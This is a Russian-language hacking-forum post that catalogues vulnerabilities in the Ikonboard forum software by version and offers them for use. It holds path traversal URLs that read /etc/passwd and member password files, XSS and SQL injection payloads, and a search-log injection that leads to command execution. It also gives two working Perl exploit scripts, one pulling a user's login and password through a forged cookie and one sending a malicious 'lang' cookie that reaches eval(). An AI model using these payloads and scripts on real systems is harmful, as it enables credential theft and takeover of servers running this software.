Ikonboard 1.x
Уявимость позволяет просмотреть содержимое любого файла, например файл с паролем пользователя форума.
Код:
http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
This would show the password file, if it is readable with the privileges of the web server.
http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00
This will replace <member> with the member name and it show the board-password (this works with administrator accounts as well).
Ikonboard 2.1.7
01 декабря, 2000
Проблема происходит в операции сценария register.cgi. Из-за недостаточной проверки параметров, можно выполнить программы, с привилегиями процесса Web сервера. Устанавливая переменную $SEND_MAIL в URL, можно определить программу (&SEND_MAIL=/path/program), которая будет выполнена в системе. Этот недостаток позволяет пользователю получить доступ к системе, выполняющей ikonboard.
Ikonboard 2.1.7b
Уязвимость позволяет просмотривать произвольные файлы в системе:
PHP код:
topic.cgi?forum=5&topic=../../../../../../../../../../../../../etc/passwd
video:
http://video.antichat.ru/file42.html
Ikonboard 2.1.9 Beta
phpBB 1.4.2
Активная XSS:
PHP код:
[img]javasCript:alert('This is the test')[/img]
Ikonboard 2.1.9
25 сентября, 2002
Ikonboard Cookie filter vulnerability
(Повышение прав, заливка шела)
Here the variable $filename come from Cookie amembernamecookie not filter "..", attacker can
sent a fake cookie("amembernamecookie"), set up or edit the file on the system, because the
write file variable not filter, so the attacker can write any content to the file, and
gain the bbs administrator's privilege.
Код:
File:Search.cgi
---[L.55-56]---
$inmembername = cookie("amembernamecookie");
$filename = $inmembername;
---
As we can see, $inmembername is the get for cookie 'amembernamecookie'
---[L.66-]---
$searchfilename = "$ikondir" . "search/$filename";
---
Exploit: http://aoh.name/sploit/aohib.txt
PHP код:
#!/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
if(@ARGV < 2) { ause(); exit();}
$h=$ARGV[0];
$u=$ARGV[1];
$www = new LWP::UserAgent;
print "[~] Attacking $h\n";
$res = $www->get("http://$h/cgi-bin/ikonboard/search.cgi?action=display" ,
'Cookie' => "amembernamecookie=../members/$u.cgi%00;") or err();
if($res->content() =~ /$u/) {print "[+] Forum may be vulnerably"; }
else {err();}
$res->content() =~ /forum=(\w+)&topic=(\w+)/;
print "\n[~] Login:$1 \r\n[~] Password:$2";
sub ause()
{
print "\n==[ AOH.NAME ]==\n\n";
print "<----------------------------------------------------->\n";
print "Ikonboard all versions users Pass view exploit \nBy Art of Hack security team [Slon, ZxZ]\r\n";
print "Ussage: aohib.pl <host> <user>\r\n";
print "<----------------------------------------------------->\n";
}
sub err() {print "[-] Forum is NOT vulnerably"; exit();}
Ikonboard 2.1.9 RussianFullPack
Уязвимость в Ikonboard позволяет удаленному пользователю выполнить XSS нападение
Уязвимость найдена в скрипте misc.cgi в форуме Ikonboard 2.1.9 в полях "aimname" и "UIN"
PHP код:
misc.cgi?action=aim&aimname=<script>javascript:alert('hello')</script>
PHP код:
misc.cgi?action=icq&UIN=<script>javascript:alert('hello')</script>
Ikonboard 2.1.9 RussianFullPack
Уязвимость в Ikonboard в search.cgi позволяет удаленному пользователю изменить содержимое логов поиска, чтобы выполнить произвольные команды на сервере.
Уязвимость обнаружена в сценарии search.cgi. Скрипт не проверяет параметры поиска, занося их в лог файл. Т.к. лог файл храниться в папке /cgi-bin/board/search, то при вызове лог файла, последний вызовется, как скрипт. Тем самым, придав сохраняемым в лог параметрам вид выполняемых perl - функций, становится возможным выполнять команды. Взломщика интересует 2 параметра. Первый параметр, вносимый в лог - это CUR_TIME, задав его значение как "#/usr/bin/perl" взломщик задаст первую строку лога.
Второй параметр SEARCH_STRING, задав вместо него "print 'Content-type: text/html\n\n'; system('ls');", взломщим получит выполнение команды "ls". Важно заметить, что двойные кавычки фильтруются сценарием, но их нужно заменить на одинарные. Знаки ">" и "<" так же фильтруются, поэтому открыть файл на запись не состоит возможным.
Так же стоит заметить, что при использовании функции поиска зарегистрированным пользователем лог файл имеет название [USERNAME]_sch.txt, если пользователь не зарегистрирован в форуме, то файл имеет название Guest[IP-адрес без точек]_sch.txt. (например, Guest127001_sch.txt).
Пример/Эксплоит: Эксплоит под Windows Apache (perl) вложен ниже. Проверено на локальной системе.
Содержание Guest127001_sch.txt после эксплоита:
PHP код:
#!perl
print 'Content-type: text/html\n\n'; system('dir');
Ikonboard 3.0.0
05 июня, 2002
Ikonboard – доска объявлений, осуществленная в Perl. Ikonboard может быть развернута для Linux, UNIX и Windows систем.
Ikonboard разрешает пользователям загружать Flash содержание, однако, возможно обработать Flash файл таким способом, что злонамеренный JavaScript будет включен в действие getURL.
Если пользователь просмотрит сообщение, содержащее злонамеренный Flash файл, JavaScript, включенный в действие getURL, выполнится в пределах контекста сайта, выполняющего Ikonboard. Уязвимость может использоваться для организации различных нападений против Web приложения (напр. Перехвата опознавательных мандатов пользователей Ikonboard).
Exploit: _http://www.securitylab.ru/analytics/216391.php
Ikonboard 3.1.0, 3.1.1, 3.1.2, и 3.1.3
Возможно выполнить произвольные SQL команды на уязвимой системе
Уязвимость существует из-за некорректно обработки входных данных в параметрах 'st' и 'keywords' сценария 'ikonboard.cgi'. Удаленный атакующий может выполнить произвольные SQL команды на уязвимой системе.
Пример:
PHP код:
http://[target]/support/ikonboard.cgi?act=ST&f=27&t=13066&hl=nickname&st=1'
http://[target]/support/ikonboard.cgi?act=Search&CODE=01&keywords='&type=name&forums=all&search_in=all&prune=0
IkonBoard 3.1.1
08 апреля, 2003
Уязвимость в проверке правильности ввода обнаружена в IkonBoard. Удаленный пользователь может выполнить команды на сервере.
Как сообщается, функция LoadLanguage() в 'Sources/Lib/FUNC.pm' не в состоянии фильтровать данные пользователя в 'lang' куки. Поскольку в последствии результаты передаются к Perl eval() функции, как часть имени директории, удаленный пользователь может создать специально обработанный 'lang' куки, чтобы выполнять произвольные команды на системе.
Эксплоит:
PHP код:
#!/usr/bin/perl -w
use strict;
my $HOST = 'www.example.domain';
my $PATH = '/cgi-bin/ikonboard.cgi';
use IO::Socket;
my $sock = IO::Socket::INET->new("$HOST:80") or die "connect: $!";
$sock->print(<<END) or die "write: $!";
GET $PATH HTTP/1.1
Host: $HOST
Cookie: lang=%2E%00%22
Connection: close
END
print while <$sock>;
Ikonboard 3.1.5 (3.1.4)
Уязвимость позволяет производить листинг директорий сервера
Сама уязвимость находится в Панели управления ---->
Настройки аватара !
Щелкаем на настройку аватара как всегда увидим папки аватаров и ниже списки самих картинок.
Ссылка будет иметь вид :
cgi-bin/forum/ikonboard.cgi?act=UserCP;CODE=01;MODE=1
Заглянем в код страницы и увидим что меню выбора папок имеет id useravatar_dir
Добавим и просмотрим :
PHP код:
cgi-bin/forum/ikonboard.cgi?act=UserCP;CODE=01;MODE=1;useravatar _dir=../../../
=======
P/s:Много кто про Ikonboard спрашивал,многим пригодиться .Извените если что-то пропустил буду пополнять раздел.Пожайлусто тока не надо говорить что это бред,Ikonboard это всёже тоже форумы и все ими пользуються .Всем спасибо за точто я у вас отнял дрогоценное время на чтиво этого топика
-
![Аватар для _-[A.M.D]HiM@S-_](/avatars/avatar21104.gif){kind=avatar}
[Обзор уязвимостей Ikonboard]
Похожие темы
Древовидный вид